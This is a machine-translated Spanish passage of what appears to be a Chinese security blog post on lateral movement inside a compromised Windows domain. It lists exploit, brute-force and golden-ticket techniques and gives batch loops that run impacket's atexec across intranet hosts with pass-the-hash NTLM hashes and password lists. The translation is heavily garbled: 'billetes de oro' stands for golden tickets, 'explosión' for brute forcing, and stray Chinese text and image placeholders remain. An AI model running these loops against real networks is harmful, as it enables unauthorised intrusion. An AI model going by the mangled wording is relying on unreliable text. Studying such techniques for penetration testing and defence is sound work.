La idea y realización del movimiento lateral.

Prefacio

Cuando obtienes una máquina en un dominio determinado, necesitas expandir aún más los resultados. En este momento, necesitas moverte lateralmente. La tecnología de movimiento lateral se basa en los resultados de la recopilación de información. La recopilación de información es muy importante. Recuerda.

Se recomiendan varios métodos de implementación:

  1. Utilice exp existente para atacar el sistema operativo, como ms17010, ms08067, etc.
  2. Utilice la contraseña para destruir ssh o el servicio smb, lo que se puede lograr con la herramienta impacket.
  3. Utilice vulnerabilidades rce en aplicaciones de servidor, como vulnerabilidades de middleware como tomcat.
  4. La fabricación de billetes de oro para el movimiento lateral se puede lograr con herramientas impacket y mimikatz.
  5. Utilice los comandos integrados de Windows para controlar de forma remota el otro host.
  6. Ataque puertos sensibles.

lograr

Usa exp para atacar el sistema operativo

Esta parte se basa principalmente en la acumulación De acuerdo con el sistema operativo de la otra parte, descargue la exp correspondiente en línea para atacar, por supuesto, puede escribir exp.

Utilice la explosión de contraseñas

Si desea atacar un host de Linux, ssh blasting es un buen método Es relativamente simple escribir un script de Python usted mismo.
Si está atacando el host de Windows, también puede usar la explosión de contraseñas. El método de implementación específico es usar la herramienta impacket:

Las máquinas de intranet se atraviesan para verificar la entrega de hash, el contenido de ips.txt es ip de intranet, uno por párrafo FOR / F% i in (ips.txt) do
atexec.exe -hashes: 3dbde697d71690a769204beb12283678
./administrator@%i whoami
Inserte la descripción de la imagen aquí

Especifique la verificación transversal de hash ntlm del host, hashes.txt es el contenido de hash ntlm conocido, uno para cada párrafo FOR / F% i en
(hashes.txt) do atexec.exe -hashes% i ./[email protected]
whoami
Inserte la descripción de la imagen aquí
文件内部的hash格式应该为":nthash"或者"lmhash:nthash",如果只采用nthash切记加一个冒号":"
Inserte la descripción de la imagen aquí

Las máquinas de intranet se recorren para verificar la contraseña, passwords.txt es el contenido de las contraseñas conocidas, una por párrafo FOR / F% i en (passwords.txt) do
atexec.exe ./administrator:%[email protected] whoami
Inserte la descripción de la imagen aquí

Especifique la verificación transversal de la contraseña del host, el contenido de ips.txt es la ip de la intranet, una por párrafo FOR / F% i en (ips.txt) do atexec.exe
./administrator:123@%i whoami

Inserte la descripción de la imagen aquí
Para obtener información más detallada, consulte mi resumen de comandos de impacket .

Explote las vulnerabilidades en las aplicaciones del lado del servidor

Muchos de estos ejemplos se explicarán en artículos uno tras otro.

Nota de oro

Consulte mi artículo sobre tecnologías relacionadas con la factura de oro:

La producción y uso de billetes de oro .
Resumen de los comandos de mimikatz más utilizados resumen de los comandos de
impacket

Utilice los comandos integrados de Windows para controlar de forma remota el otro host

Los dos artículos siguientes lo describen con más detalle:

Los comandos remotos de Windows ejecutan
comandos de acceso directo comunes de Windows

Ataque a puertos sensibles

Primero puede echar un vistazo a mis métodos de ataque comunes para puertos sensibles, y luego escribiré artículos específicos para explicar los puntos de conocimiento correspondientes.

Apéndice: recopilación de información posterior a la infiltración

Mis dos artículos lo resumen:

Recopilación de información de Windows y posicionamiento en intranet
después de la recopilación de información de penetración de Linux

Supongo que te gusta

Origin blog.csdn.net/qq_41874930/article/details/108274266
Recomendado
Clasificación